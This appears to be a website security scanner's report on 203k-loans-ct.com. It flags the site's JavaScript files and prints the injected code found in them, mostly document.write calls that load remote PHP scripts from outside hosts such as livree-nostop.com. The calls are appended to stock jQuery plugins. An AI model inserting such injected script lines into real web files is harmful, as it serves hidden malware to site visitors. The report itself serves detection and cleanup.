Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=203k-loans-ct.com
Result: The website is marked by Google as suspicious: visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://203k-loans-ct.com/ | 200 OK Content-Length: 19157 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://7487.aqq.ru/fhxH9WLK.php?id=9713739"></script> | ||
http://203k-loans-ct.com/_include/js/jquery.js | 200 OK Content-Length: 77950 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161764"></script>'); | ||
http://203k-loans-ct.com/_include/js/jquery.badBrowser.js | 200 OK Content-Length: 1805 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161757"></script>'); | ||
http://203k-loans-ct.com/_include/js/jquery.tools.js | 200 OK Content-Length: 207 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161768"></script>'); | ||
http://203k-loans-ct.com/_include/js/jquery.easing.js | 200 OK Content-Length: 8269 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is abridged by the scanner (gaps are marked "…"); the body appears to be the stock jQuery easing plugin, and the statement that stands out is the document.write() call appended after the plugin's closing "});".
jQuery.easing['jswing'] = jQuery.easing['swing']; jQuery.extend( jQuery.easing, { def: 'easeOutQuad', swing: function (x, t, b, c, d) { return jQuery.easing[jQuery.easing.def](x, t, b, c, d); }, easeInQuad: function (x, t, b, c, d) { return c*(t/=d)*t + b; }, easeOutQuad: function (x, t, b, c, d) { return -c *(t/=d)*(t-2) + b; }, easeInOutQuad: function (x, t, b, c, d) { if ((t/=d/2) < 1) return c/2*t*t + b; retur … } else if (t < (2.5/2.75)) { return c*(7.5625*(t-=(2.25/2.75))*t + .9375) + b; } else { return c*(7.5625*(t-=(2.625/2.75))*t + .984375) + b; } }, easeInOutBounce: function (x, t, b, c, d) { if (t < d/2) return jQuery.easing.easeInBounce (x, t*2, 0, c, d) * .5 + b; return jQuery.easing.easeOutBounce (x, t*2-d, 0, c, d) * .5 + c*.5 + b; } }); document.write('<img src="http://localhost/" >');
Antivirus reports:
| ||
http://203k-loans-ct.com/_include/js/cufon.js | 200 OK Content-Length: 39657 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161754"></script>'); | ||
http://203k-loans-ct.com/_include/js/Vera_400-Vera_700-Vera_oblique_400-Vera_oblique_700.font.js | 200 OK Content-Length: 181022 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161753"></script>'); | ||
http://203k-loans-ct.com/_include/js/jquery.prettyPhoto.js | 200 OK Content-Length: 29835 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161767"></script>'); | ||
http://203k-loans-ct.com/_include/js/jquery.hoverInt.js | 200 OK Content-Length: 3380 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is abridged by the scanner (gaps are marked "…"); the body appears to be the hoverIntent jQuery plugin, and the statement that stands out is the document.write() call appended after the plugin's closing "})(jQuery);".
(function($){ $.fn.hoverIntent = function(f,g) { var cfg = { sensitivity: 7, interval: 100, timeout: 0 }; cfg = $.extend(cfg, g ? { over: f, out: g } : f ); var cX, cY, pX, pY; var track = function(ev) { cX = ev.pageX; cY = ev.pageY; }; var compare = function(ev,ob) { ob.hoverIntent_t = clearTimeout(ob.hoverIntent_t); if ( ( Math.abs(pX-cX) + Math.abs(pY-cY) ) < cfg.sensitivi … if (ob.hoverIntent_s != 1) { ob.hoverIntent_t = setTimeout( function(){compare(ev,ob);} , cfg.interval );} } else { $(ob).unbind("mousemove",track); if (ob.hoverIntent_s == 1) { ob.hoverIntent_t = setTimeout( function(){delay(ev,ob);} , cfg.timeout );} } }; return this.mouseover(handleHover).mouseout(handleHover); }; })(jQuery); document.write('<img src="http://localhost/" >');
Antivirus reports:
| ||
http://203k-loans-ct.com/_include/js/jquery.bgiframe.js | 200 OK Content-Length: 1931 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161758"></script>'); | ||
http://203k-loans-ct.com/_include/js/superfish.js | 200 OK Content-Length: 3906 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is abridged by the scanner (gaps are marked "…"); the body appears to be the Superfish jQuery menu plugin, and the statement that stands out is the document.write() call appended after the plugin's closing "})(jQuery);".
;(function($){ $.fn.superfish = function(op){ var sf = $.fn.superfish, c = sf.c, $arrow = $(['<span class="',c.arrowClass,'"> »</span>'].join('')), over = function(){ var $$ = $(this), menu = getMenu($$); clearTimeout(menu.sfTimer); $$.showSuperfishUl().siblings().hideSuperfishUl(); }, out = function(){ var $$ = $(this), menu = getMenu($$), o = sf.op; clearTimeout(menu.sfTimer); men … return this; }, showSuperfishUl : function(){ var o = sf.op, sh = sf.c.shadowClass + '-off', $ul = this.addClass(o.hoverClass) .find('>ul:hidden').css('visibility','visible'); sf.IE7fix.call($ul); o.onBeforeShow.call($ul); $ul.animate(o.animation,o.speed,function(){ sf.IE7fix.call($ul); o.onShow.call($ul); }); return this; } }); })(jQuery); document.write('<img src="http://localhost/" >');
Antivirus reports:
| ||
http://203k-loans-ct.com/_include/js/swfobject.js | 200 OK Content-Length: 10425 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is abridged by the scanner (the gap is marked "…"), so the trailing "ac=" is the point where the minified library text was cut off, not an assignment of the document.write() call that follows it.
var swfobject=function(){var D="undefined",r="object",S="Shockwave Flash",W="ShockwaveFlash.ShockwaveFlash",q="application/x-shockwave-flash",R="SWFObjectExprInst",x="onreadystatechange",O=window,j=document,t=navigator,T=false,U=[h],o=[],N=[],I=[],l,Q,E,B,J=false,a=false,n,G,m=true,M=function(){var aa=typeof j.getElementById!=D&&typeof j.getElementsByTagName!=D&&typeof j.createElement!=D,ah=t.userAgent.toLowerCase(),Y=t.platform.toLowerCase(),ae=Y?/win/.test(Y):/win/.test(ah),ac= … document.write('<img src="http://localhost/" >');
Antivirus reports:
| ||
http://203k-loans-ct.com/_include/js/jquery.captify.js | 200 OK Content-Length: 5749 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161759"></script>'); | ||
http://203k-loans-ct.com/_include/js/custom.js | 200 OK Content-Length: 2250 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=106161755"></script>'); | ||
http://203k-loans-ct.com/_include/js/jqplot/jquery.jqplot.js | 200 OK Content-Length: 298822 Content-Type: application/javascript | suspicious |
Suspicious code found document.write('<script type="text/javascript" src="http://livree-nostop.com/hy2vdlyg.php?id=9713792"></script>'); |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: 203k-loans-ct.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 Jun 2014 17:30:06 GMT
Accept-Ranges: bytes
Server: nginx/1.6.0
Content-Length: 19157
Content-Type: text/html
Last-Modified: Mon, 17 Mar 2014 22:15:31 GMT
...19157 bytes of data.
GET / HTTP/1.1
Host: 203k-loans-ct.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 05 Jun 2014 17:30:06 GMT
Accept-Ranges: bytes
Server: nginx/1.6.0
Content-Length: 19157
Content-Type: text/html
Last-Modified: Mon, 17 Mar 2014 22:15:31 GMT
...19157 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: 203k-loans-ct.com
Referer: http://www.google.com/search?q=203k-loans-ct.com
Result:
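The result is similar to the first query. There are no suspicious redirects found. This check varies only the Referer header, so a redirect conditioned on other request properties (for example the User-Agent or the client address) would not show up here.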
GET / HTTP/1.1
Host: 203k-loans-ct.com
Referer: http://www.google.com/search?q=203k-loans-ct.com
Result:
The result is similar to the first query. There are no suspicious redirects found.